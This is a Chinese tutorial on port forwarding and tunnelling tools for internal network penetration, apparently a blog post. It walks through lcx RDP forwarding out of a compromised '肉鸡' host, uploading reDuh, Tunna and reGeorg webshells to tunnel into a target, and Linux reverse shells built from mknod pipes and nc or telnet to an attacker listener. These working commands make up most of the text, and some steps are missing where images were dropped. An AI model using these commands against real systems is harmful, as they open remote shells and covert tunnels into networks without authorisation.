内网渗透中转发工具总结

Jul 11, 2017

LCX转发

本机：192.168.1.110
靶机：192.168.1.128

首先远程目标系统要开启远程访问功能（若未开可通过开3389命令开启）.

lcx.exe是个端口转发工具，相当于把肉鸡A上的3389端口转发到B机上，当然这个B机必须有外网IP。这样链接B机的3389端口就相当于链接A机的3389。

首先在本地进行监听，监听51端口并转发到33891端口

1	lcx.exe -listen 51 33891

内网机器上执行：lcx.exe –slave 公网IP +端口内网IP +端口

将内网(192.168.1.128)的3389端口转发到公网(192.168.1.110)的51端口

1	lcx.exe –slave 192.168.1.110 51 192.168.1.128 3389

远程桌面访问33891端口

NC转发

本机：192.168.1.125
靶机：192.168.1.128

正向连接

在靶机上

在本机上操作，并成功获得一个远程机器的shell

反向连接

在本机运行上

在远程机器上，然后成功之后，在本地机器上获得一个远程机器的cmdshell

Redduh内网反弹

本机：192.168.1.110
靶机：192.168.1.128

服务端是个webshell（针对不同服务器有aspx,php,jsp三个版本），客户端是java写的，本地要安装jdk。

这里我们以php网站为例，首先将php文件上传到服务器端。

浏览器中访问上传的webshell，提示以下内容说明解析成功

用客户端连接服务器

1	java -jar reDuhClient.jar http://192.168.1.125/reDuh.php

本地连接1010端口

1 2	nc.exe -vv localhost 1010 [createTunnel]1235:127.0.0.1:3389

远程登录

Tunna内网反弹

靶机：192.168.1.137
本机：192.168.1.110

以下为后门文件，该工具是Python所写，需要Python环境，同样有jsp、aspx、php版本的webshell

这里使用php网站进行测试，上传php后门

1	python proxy.py -u http://192.168.1.137/conn.php -l 1234 -r 3389 -v –s

远程连接

Linux系统通过nc反弹shell

本机：192.168.1.117
靶机：192.168.1.116

首先，攻击端进行监听

1	nc.exe -lvnp 2333

服务端执行

1	mknod /tmp/backpipe p

1	/bin/sh 0</tmp/backpipe \| nc 192.168.1.117 2333 1>/tmp/backpipe

执行命令，查看发现反弹成功

内置命令反弹

1	nc.exe -lvnp 2333

服务器端执行

1 2	mknod /tmp/backpipe p telnet 192.168.1.117 2333 0<backpipe \| /bin/bash 1>backpipe

反弹成功

reGeorg+proxifier正向代理

靶机：192.168.1.117
本机：192.168.1.110

reGeorg是reDuh的继承者，利用了会话层的socks5协议，效率更高一些。这也是平时用的比较多的工具。

先将reGeorg的对应脚本上传到服务器端，直接访问显示“Georg says, ‘All seems fine’”，表示脚本运行正常

1	python reGeorgSocksProxy.py -p 8888 -u http://192.168.1.117/tunnel.php

将proxifier打开，在Proxy Server中这样配置

右击“mstsc.exe”，选择“proxifier”-》proxy socks5 127.0.0.1进行远程连接

输入内网ip，192.168.1.117

可以看到reGeorg的状态，和proxifier的状态